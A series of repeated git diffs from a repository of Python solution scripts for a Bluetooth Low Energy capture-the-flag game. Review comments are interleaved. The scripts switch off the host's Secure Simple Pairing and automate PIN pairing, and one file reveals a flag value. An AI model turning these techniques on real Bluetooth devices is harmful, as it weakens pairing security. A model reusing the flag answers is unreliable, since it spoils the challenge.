diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null 
@@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null 
@@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' @@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md 
@@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null @@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' 
@@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_02.py b/lvl_02.py index b6665d8..58d3e7a 100755 --- a/lvl_02.py +++ b/lvl_02.py @@ -38,4 +38,4 @@ print "Flag: %s" % hexlif2 break; -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null 
@@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' @@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_02.py b/lvl_02.py index b6665d8..58d3e7a 100755 --- a/lvl_02.py +++ b/lvl_02.py @@ -38,4 +38,4 @@ print "Flag: %s" % hexlif2 break; -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_03.py b/lvl_03.py index 8303d8c..1ae79f8 100755 --- a/lvl_03.py +++ b/lvl_03.py 
@@ -22,9 +22,10 @@ def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions) "exectutes pairing with entered PIN on bluetooth adapter side" try: - + newpid = os.fork() if newpid == 0: + time.sleep(5) ''' Start bluepy stuff ''' @@ -34,7 +35,7 @@ deviceMAC = open('ctf_mac.txt').read() p = btle.Peripheral(deviceMAC) svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb") - print ("Attached to peripheral") + print ("Attached to peripheral (pid 0)") hex1 = p.readCharacteristic(0x2C) hex2 = binascii.b2a_hex(hex1) hexlif2 = str(binascii.unhexlify(hex2)) @@ -42,12 +43,14 @@ p.disconnect() exit() else: + ''' - Start actual pair stuff + Start actual pair stuff ''' subprocess.call(['hciconfig','hci0','sspmode', '0']) # bluetoothctl + print("Pairing") child = pexpect.spawn('bluetoothctl') child.logfile = open("/tmp/mylog", "w") child.expect("#") @@ -63,6 +66,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic @@ -74,6 +79,7 @@ child.sendline(trust_mac) # optionally add device to trusted child.expect('trust succeeded', timeout = 10) pairing_status = True + child.sendline('remove 3c:71:bf:f1:ef:c6') else: # i == 1 print('wrong PIN, retrying if time will allow') except pexpect.EOF: @@ -107,4 +113,4 @@ status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT) if status == True: - print('Pairing successful') \ No newline at end of file + print('Pairing successful') diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md 
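Review bot: The `time.sleep(5)` added in the child branch is a fixed-delay race against the parent's pairing: the passkey prompt alone is allowed up to `time_limit` seconds (60 by default, per the signature in the hunk header), so when pairing is slower than 5 s the child connects with bluepy and reads handle 0x2C before the bond exists, and when it is faster the child just idles. A pipe created before `os.fork()` lets the parent release the child exactly when pairing has succeeded, and EOF on the pipe (parent exited without pairing) can be treated as failure instead of reading anyway. `pair_with_pin` starts before this hunk and its body continues well past it, so the write side belongs in the parent branch after `trust succeeded`, which is in a later hunk.
```python
r_end, w_end = os.pipe()   # created before fork so both processes hold both ends
newpid = os.fork()
if newpid == 0:
    os.close(w_end)
    if os.read(r_end, 1) != b'1':   # EOF: parent gave up without pairing
        os._exit(1)
    os.close(r_end)
    # ... unchanged: bluepy connect and read of 0x2C ...
else:
    os.close(r_end)
    # ... unchanged: hciconfig / bluetoothctl pairing ...
    # after child.expect('trust succeeded', ...) in the later hunk:
    os.write(w_end, b'1')
    os.close(w_end)
```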
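Review bot: The new `print("Pairing")` sits directly after `subprocess.call(['hciconfig','hci0','sspmode', '0'])`, which turns Secure Simple Pairing off for the whole adapter, and nothing in the visible hunks turns it back on, so after the script exits every later pairing on hci0 stays downgraded to legacy PIN pairing until it is reset by hand. Since legacy pairing is needed only for this level, restore it in a `finally:` on the surrounding `try` (opened in the first hunk): `subprocess.call(['hciconfig', 'hci0', 'sspmode', '1'])`. The bluetoothctl transcript, PIN included, is also written to the fixed path `/tmp/mylog` with default permissions; `tempfile.NamedTemporaryFile(prefix='bluetoothctl-', delete=False)` (needs `import tempfile`) gives a private, unpredictable file with the same debugging value. `pair_with_pin` continues past this hunk.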
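Review bot: `child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")` has no `timeout`, so it uses pexpect's 30 s default and raises `pexpect.TIMEOUT` if the advertisement is not seen; the only handler visible nearby is `except pexpect.EOF`, so unless a TIMEOUT clause exists outside the hunk this aborts the function instead of reporting a failed attempt. The pattern also hard-codes both the address (the child branch reads it from `ctf_mac.txt`) and the level-3 device name, and `scan on` is never followed by `scan off`, so discovery keeps running through the `pair` that follows. I would match on the address alone, bound the wait by the pairing window and stop scanning once the device is seen: `child.expect(r"Device 3C:71:BF:F1:EF:C6", timeout=time_limit)` followed by `child.sendline('scan off')`.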
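Review bot: The `remove 3c:71:bf:f1:ef:c6` added after `pairing_status = True` deletes the bond the parent just created while the forked child, which only waits 5 s before connecting with bluepy, may still be connecting or mid-read, so the read of 0x2C can end up running without the bond this level exists to obtain; it is also fire-and-forget, with no `expect` on bluetoothctl's reply. Wait for the child first and only then drop the bond: `os.waitpid(newpid, 0)` before the `sendline`, then an `expect` on the removal confirmation with a short timeout. Whether the child has already finished by this point depends on the sleep in the first hunk, which nothing visible coordinates.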
@@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null @@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' 
@@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_02.py b/lvl_02.py index b6665d8..58d3e7a 100755 --- a/lvl_02.py +++ b/lvl_02.py @@ -38,4 +38,4 @@ print "Flag: %s" % hexlif2 break; -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_03.py b/lvl_03.py index 8303d8c..1ae79f8 100755 --- a/lvl_03.py +++ b/lvl_03.py @@ -22,9 +22,10 @@ def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions) "exectutes pairing with entered PIN on bluetooth adapter side" try: - + newpid = os.fork() if newpid == 0: + time.sleep(5) ''' Start bluepy stuff ''' @@ -34,7 +35,7 @@ deviceMAC = open('ctf_mac.txt').read() p = btle.Peripheral(deviceMAC) svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb") - print ("Attached to peripheral") + print ("Attached to peripheral (pid 0)") hex1 = p.readCharacteristic(0x2C) hex2 = binascii.b2a_hex(hex1) hexlif2 = str(binascii.unhexlify(hex2)) @@ -42,12 +43,14 @@ p.disconnect() exit() else: + ''' - Start actual pair stuff + Start actual pair stuff ''' subprocess.call(['hciconfig','hci0','sspmode', '0']) # bluetoothctl + print("Pairing") child = pexpect.spawn('bluetoothctl') child.logfile = open("/tmp/mylog", "w") child.expect("#") @@ -63,6 +66,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic 
@@ -74,6 +79,7 @@ child.sendline(trust_mac) # optionally add device to trusted child.expect('trust succeeded', timeout = 10) pairing_status = True + child.sendline('remove 3c:71:bf:f1:ef:c6') else: # i == 1 print('wrong PIN, retrying if time will allow') except pexpect.EOF: @@ -107,4 +113,4 @@ status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT) if status == True: - print('Pairing successful') \ No newline at end of file + print('Pairing successful') diff --git a/lvl_04.py b/lvl_04.py index 21ede3e..91a4029 100755 --- a/lvl_04.py +++ b/lvl_04.py @@ -93,7 +93,7 @@ #sys.stdout.write(" Response: " + hexstr) # for debugging if(password.strip("0") != hexstr): - print(" Flag: %s" % notificationData.rstrip()) + print("\nFlag: %s" % notificationData.rstrip()) exit() else: gotResponse = True @@ -101,4 +101,4 @@ print "Waiting..." finally: - p.disconnect() \ No newline at end of file + p.disconnect() diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null 
@@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' @@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_02.py b/lvl_02.py index b6665d8..58d3e7a 100755 --- a/lvl_02.py +++ b/lvl_02.py @@ -38,4 +38,4 @@ print "Flag: %s" % hexlif2 break; -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_03.py b/lvl_03.py index 8303d8c..1ae79f8 100755 --- a/lvl_03.py +++ b/lvl_03.py 
@@ -22,9 +22,10 @@ def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions) "exectutes pairing with entered PIN on bluetooth adapter side" try: - + newpid = os.fork() if newpid == 0: + time.sleep(5) ''' Start bluepy stuff ''' @@ -34,7 +35,7 @@ deviceMAC = open('ctf_mac.txt').read() p = btle.Peripheral(deviceMAC) svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb") - print ("Attached to peripheral") + print ("Attached to peripheral (pid 0)") hex1 = p.readCharacteristic(0x2C) hex2 = binascii.b2a_hex(hex1) hexlif2 = str(binascii.unhexlify(hex2)) @@ -42,12 +43,14 @@ p.disconnect() exit() else: + ''' - Start actual pair stuff + Start actual pair stuff ''' subprocess.call(['hciconfig','hci0','sspmode', '0']) # bluetoothctl + print("Pairing") child = pexpect.spawn('bluetoothctl') child.logfile = open("/tmp/mylog", "w") child.expect("#") @@ -63,6 +66,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic @@ -74,6 +79,7 @@ child.sendline(trust_mac) # optionally add device to trusted child.expect('trust succeeded', timeout = 10) pairing_status = True + child.sendline('remove 3c:71:bf:f1:ef:c6') else: # i == 1 print('wrong PIN, retrying if time will allow') except pexpect.EOF: @@ -107,4 +113,4 @@ status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT) if status == True: - print('Pairing successful') \ No newline at end of file + print('Pairing successful') diff --git a/lvl_04.py b/lvl_04.py index 21ede3e..91a4029 100755 --- a/lvl_04.py +++ b/lvl_04.py 
@@ -93,7 +93,7 @@ #sys.stdout.write(" Response: " + hexstr) # for debugging if(password.strip("0") != hexstr): - print(" Flag: %s" % notificationData.rstrip()) + print("\nFlag: %s" % notificationData.rstrip()) exit() else: gotResponse = True @@ -101,4 +101,4 @@ print "Waiting..." finally: - p.disconnect() \ No newline at end of file + p.disconnect() diff --git a/lvl_07.py b/lvl_07.py index 8b6ae2e..6e56906 100755 --- a/lvl_07.py +++ b/lvl_07.py @@ -46,6 +46,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') i = child.expect('Paired: yes', timeout = time_limit) @@ -73,7 +75,7 @@ print ("[bp] Attached to peripheral") print("[++] Loading level 07") -hex1 = binascii.unhexlify(str('%0*x' % (4,3))) +hex1 = binascii.unhexlify(str('%0*x' % (4,7))) p.writeCharacteristic(0x30, hex1, withResponse=False) p.disconnect() @@ -96,4 +98,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("[==] Flag: "+hexlif2) p.disconnect() -exit() \ No newline at end of file +exit() diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null 
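Review bot: `child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")` is copied verbatim from lvl_03.py into the level-7 script; if the peripheral's advertised name follows the level (this commit itself corrects the level selector to 7 further down), the pattern never matches, and with no `timeout` argument pexpect waits its 30 s default and raises `pexpect.TIMEOUT`, which the surrounding `try` (outside the hunk) may not handle. Match on the address only and bound the wait by the pairing window: `child.expect(r"Device 3C:71:BF:F1:EF:C6", timeout=time_limit)`, then `child.sendline('scan off')` so discovery does not compete with the `pair` that follows. The enclosing function starts before this hunk.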
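Review bot: The corrected selector `'%0*x' % (4,7)` and the `print("[++] Loading level 07")` two lines above now encode the level in two places, which is exactly how the stale `3` survived the copy from the level-3 script. Derive both from one constant: `LEVEL = 7`, `print("[++] Loading level %02d" % LEVEL)`, `hex1 = binascii.unhexlify('%04x' % LEVEL)`; `'%04x' % 7` yields the same `'0007'` the `%0*x` form does. The write to 0x30 is still `withResponse=False`, so nothing confirms the level actually switched before `p.disconnect()`.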
@@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' @@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_02.py b/lvl_02.py index b6665d8..58d3e7a 100755 --- a/lvl_02.py +++ b/lvl_02.py @@ -38,4 +38,4 @@ print "Flag: %s" % hexlif2 break; -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_03.py b/lvl_03.py index 8303d8c..1ae79f8 100755 --- a/lvl_03.py +++ b/lvl_03.py 
@@ -22,9 +22,10 @@ def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions) "exectutes pairing with entered PIN on bluetooth adapter side" try: - + newpid = os.fork() if newpid == 0: + time.sleep(5) ''' Start bluepy stuff ''' @@ -34,7 +35,7 @@ deviceMAC = open('ctf_mac.txt').read() p = btle.Peripheral(deviceMAC) svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb") - print ("Attached to peripheral") + print ("Attached to peripheral (pid 0)") hex1 = p.readCharacteristic(0x2C) hex2 = binascii.b2a_hex(hex1) hexlif2 = str(binascii.unhexlify(hex2)) @@ -42,12 +43,14 @@ p.disconnect() exit() else: + ''' - Start actual pair stuff + Start actual pair stuff ''' subprocess.call(['hciconfig','hci0','sspmode', '0']) # bluetoothctl + print("Pairing") child = pexpect.spawn('bluetoothctl') child.logfile = open("/tmp/mylog", "w") child.expect("#") @@ -63,6 +66,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic @@ -74,6 +79,7 @@ child.sendline(trust_mac) # optionally add device to trusted child.expect('trust succeeded', timeout = 10) pairing_status = True + child.sendline('remove 3c:71:bf:f1:ef:c6') else: # i == 1 print('wrong PIN, retrying if time will allow') except pexpect.EOF: @@ -107,4 +113,4 @@ status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT) if status == True: - print('Pairing successful') \ No newline at end of file + print('Pairing successful') diff --git a/lvl_04.py b/lvl_04.py index 21ede3e..91a4029 100755 --- a/lvl_04.py +++ b/lvl_04.py 
